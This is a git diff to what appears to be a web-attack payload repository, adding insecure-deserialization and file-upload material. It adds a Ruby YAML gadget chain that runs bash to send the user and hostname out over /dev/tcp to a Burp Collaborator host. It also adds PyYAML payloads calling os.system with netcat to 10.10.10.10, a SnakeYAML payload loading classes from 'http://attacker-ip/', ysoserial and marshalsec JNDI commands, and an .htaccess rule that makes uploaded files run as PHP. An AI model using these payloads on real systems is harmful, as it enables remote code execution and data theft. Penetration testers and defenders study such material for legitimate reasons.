diff --git a/.gitignore b/.gitignore index 18dcf8e89d..5d5f0c5e26 100644 --- a/.gitignore +++ b/.gitignore @@ -1,4 +1,3 @@ BuildPDF/ .vscode -.todo -AWS Amazon Lambda/ \ No newline at end of file +.todo \ No newline at end of file diff --git a/Insecure Deserialization/Files/PHP-Serialization-RCE-Exploit.php b/Insecure Deserialization/Files/PHP-Serialization-RCE-Exploit.php deleted file mode 100644 index 8ae88dbe83..0000000000 --- a/Insecure Deserialization/Files/PHP-Serialization-RCE-Exploit.php +++ /dev/null @@ -1,32 +0,0 @@ - diff --git a/Insecure Deserialization/Files/ruby-serialize.yaml b/Insecure Deserialization/Files/ruby-serialize.yaml new file mode 100644 index 0000000000..45da864104 --- /dev/null +++ b/Insecure Deserialization/Files/ruby-serialize.yaml @@ -0,0 +1,19 @@ +--- +- !ruby/object:Gem::Installer + i: x +- !ruby/object:Gem::SpecFetcher + i: y +- !ruby/object:Gem::Requirement + requirements: + !ruby/object:Gem::Package::TarReader + io: &1 !ruby/object:Net::BufferedIO + io: &1 !ruby/object:Gem::Package::TarReader::Entry + read: 0 + header: "abc" + debug_output: &1 !ruby/object:Net::WriteAdapter + socket: &1 !ruby/object:Gem::RequestSet + sets: !ruby/object:Net::WriteAdapter + socket: !ruby/module 'Kernel' + method_id: :system + git_set: "bash -c 'echo 1 > /dev/tcp/`whoami`.`hostname`.wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net/443'" + method_id: :resolve \ No newline at end of file diff --git a/Insecure Deserialization/Java.md b/Insecure Deserialization/Java.md index 71404a6839..a40b19ac7d 100644 --- a/Insecure Deserialization/Java.md +++ b/Insecure Deserialization/Java.md @@ -11,7 +11,7 @@ ## Exploit -[ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. +[frohoff/ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. ```java java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin @@ -20,37 +20,44 @@ java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > pay java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64 ``` -payload | author | dependencies | impact (if not RCE) -------|--------|------ |------ -BeanShell1 |@pwntester, @cschneider4711 |bsh:2.0b5 -C3P0 |@mbechler |c3p0:0.9.5.2, mchange-commons-java:0.2.11 -Clojure |@JackOfMostTrades |clojure:1.8.0 -CommonsBeanutils1 |@frohoff |commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 -CommonsCollections1 |@frohoff |commons-collections:3.1 -CommonsCollections2 |@frohoff |commons-collections4:4.0 -CommonsCollections3 |@frohoff |commons-collections:3.1 -CommonsCollections4 |@frohoff |commons-collections4:4.0 -CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1 -CommonsCollections6 |@matthias_kaiser |commons-collections:3.1 -FileUpload1 |@mbechler |commons-fileupload:1.3.1, commons-io:2.4 | file uploading -Groovy1 |@frohoff |groovy:2.3.9 -Hibernate1 |@mbechler| -Hibernate2 |@mbechler| -JBossInterceptors1 |@matthias_kaiser |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 -JRMPClient |@mbechler| -JRMPListener |@mbechler| -JSON1 |@mbechler |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 -JavassistWeld1 |@matthias_kaiser |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 -Jdk7u21 |@frohoff| -Jython1 |@pwntester, @cschneider4711 |jython-standalone:2.5.2 -MozillaRhino1 |@matthias_kaiser |js:1.7R2 -Myfaces1 |@mbechler| -Myfaces2 |@mbechler| -ROME |@mbechler |rome:1.0 -Spring1 |@frohoff |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE -Spring2 |@mbechler |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 -URLDNS |@gebl| | jre only vuln detect -Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:1.6.4 +```ps1 +Payload Authors Dependencies +------- ------- ------------ +AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2 +BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5 +C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11 +Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0 +Clojure @JackOfMostTrades clojure:1.8.0 +CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 +CommonsCollections1 @frohoff commons-collections:3.1 +CommonsCollections2 @frohoff commons-collections4:4.0 +CommonsCollections3 @frohoff commons-collections:3.1 +CommonsCollections4 @frohoff commons-collections4:4.0 +CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1 +CommonsCollections6 @matthias_kaiser commons-collections:3.1 +CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1 +FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4 +Groovy1 @frohoff groovy:2.3.9 +Hibernate1 @mbechler +Hibernate2 @mbechler +JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 +JRMPClient @mbechler +JRMPListener @mbechler +JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 +JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 +Jdk7u21 @frohoff +Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2 +MozillaRhino1 @matthias_kaiser js:1.7R2 +MozillaRhino2 @_tint0 js:1.7R2 +Myfaces1 @mbechler +Myfaces2 @mbechler +ROME @mbechler rome:1.0 +Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE +Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 +URLDNS @gebl +Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14 +Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4 +``` ## Burp extensions using ysoserial @@ -69,7 +76,8 @@ Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api: - [marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution ```java -java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec. [-a] [-v] [-t] [ []] +$ java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec. [-a] [-v] [-t] [ []] +$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389 where -a - generates/tests all payloads for that marshaller @@ -101,10 +109,12 @@ Payload generators for the following marshallers are included:
## References - [Github - ysoserial](https://github.com/frohoff/ysoserial) +- [Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/) +- [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau | Mar 22, 2017](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/) - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) - [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) - [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) - [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) - [Jackson CVE-2019-12384: anatomy of a vulnerability class](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html) - [On Jackson CVEs: Don’t Panic — Here is what you need to know](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062#da96) -- [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464) \ No newline at end of file +- [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464) diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md index 14df5714c8..6faf500660 100644 --- a/Insecure Deserialization/README.md +++ b/Insecure Deserialization/README.md @@ -8,6 +8,7 @@ Check the following sub-sections, located in other files : * [PHP (Object injection) : phpggc, ...](PHP.md) * [Ruby : universal rce gadget, ...](Ruby.md) * [Python : pickle, ...](Python.md) +* [YAML : PyYAML, ...](YAML.md) ## References diff --git a/Insecure Deserialization/Ruby.md b/Insecure Deserialization/Ruby.md index 79c91e7e02..c3f2fa658e 100644 --- a/Insecure Deserialization/Ruby.md +++ b/Insecure Deserialization/Ruby.md @@ -59,4 +59,5 @@ Universal gadget for ruby 2.x - 3.x. - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) - [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/) - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) -- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/) \ No newline at end of file +- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/) +* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/) \ No newline at end of file diff --git a/Insecure Deserialization/YAML.md b/Insecure Deserialization/YAML.md new file mode 100644 index 0000000000..326394c340 --- /dev/null +++ b/Insecure Deserialization/YAML.md @@ -0,0 +1,89 @@ +# YAML Deserialization + +## Summary + +* [Tools](#tools) +* [Exploit](#exploit) + * [PyYAML](#pyyaml) + * [ruamel.yaml](#ruamelyaml) + * [Ruby](#ruby) + * [SnakeYAML](#snakeyaml) +* [References](#references) + +## Tools + +* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) +* [artsploit/yaml-payload](https://github.com/artsploit/yaml-payload) - A tiny project for generating SnakeYAML deserialization payloads +* [mbechler/marshalsec](https://github.com/mbechler/marshalsec) + +## Exploit + +### PyYAML + +```yaml +!!python/object/apply:time.sleep [10] +!!python/object/apply:builtins.range [1, 10, 1] +!!python/object/apply:os.system ["nc 10.10.10.10 4242"] +!!python/object/apply:os.popen ["nc 10.10.10.10 4242"] +!!python/object/new:subprocess [["ls","-ail"]] +!!python/object/new:subprocess.check_output [["ls","-ail"]] +``` + +```yaml +!!python/object/apply:subprocess.Popen +- ls +``` + +```yaml +!!python/object/new:str +state: !!python/tuple +- 'print(getattr(open("flag\x2etxt"), "read")())' +- !!python/object/new:Warning + state: + update: !!python/name:exec +``` + +## Ruamel.yaml + +## Ruby + +```ruby + --- + - !ruby/object:Gem::Installer + i: x + - !ruby/object:Gem::SpecFetcher + i: y + - !ruby/object:Gem::Requirement + requirements: + !ruby/object:Gem::Package::TarReader + io: &1 !ruby/object:Net::BufferedIO + io: &1 !ruby/object:Gem::Package::TarReader::Entry + read: 0 + header: "abc" + debug_output: &1 !ruby/object:Net::WriteAdapter + socket: &1 !ruby/object:Gem::RequestSet + sets: !ruby/object:Net::WriteAdapter + socket: !ruby/module 'Kernel' + method_id: :system + git_set: sleep 600 + method_id: :resolve +``` + +## SnakeYAML + +```yaml +!!javax.script.ScriptEngineManager [ + !!java.net.URLClassLoader [[ + !!java.net.URL ["http://attacker-ip/"] + ]] +] +``` + + +## References + +* [Python Yaml Deserialization - hacktricks.xyz][https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization] +* [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13][https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf] +* [PyYAML Documentation](https://pyyaml.org/wiki/PyYAMLDocumentation) +* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/) +* [[CVE-2019-20477]- 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - @_j0lt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/) \ No newline at end of file diff --git a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_rce_files b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_rce_files new file mode 100644 index 0000000000..64b38fbcc5 --- /dev/null +++ b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_rce_files @@ -0,0 +1 @@ +AddType application/x-httpd-php .rce \ No newline at end of file diff --git a/Upload Insecure Files/Configuration Apache .htaccess/README.md b/Upload Insecure Files/Configuration Apache .htaccess/README.md index 30b059d31b..a340e91b52 100644 --- a/Upload Insecure Files/Configuration Apache .htaccess/README.md +++ b/Upload Insecure Files/Configuration Apache .htaccess/README.md @@ -25,6 +25,11 @@ AddType application/x-httpd-php .htaccess &1"); ?> ``` +# .htaccess simple php + +Upload an .htaccess with : `AddType application/x-httpd-php .rce` +Then upload any file with `.rce` extension. + # .htaccess upload as image If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot.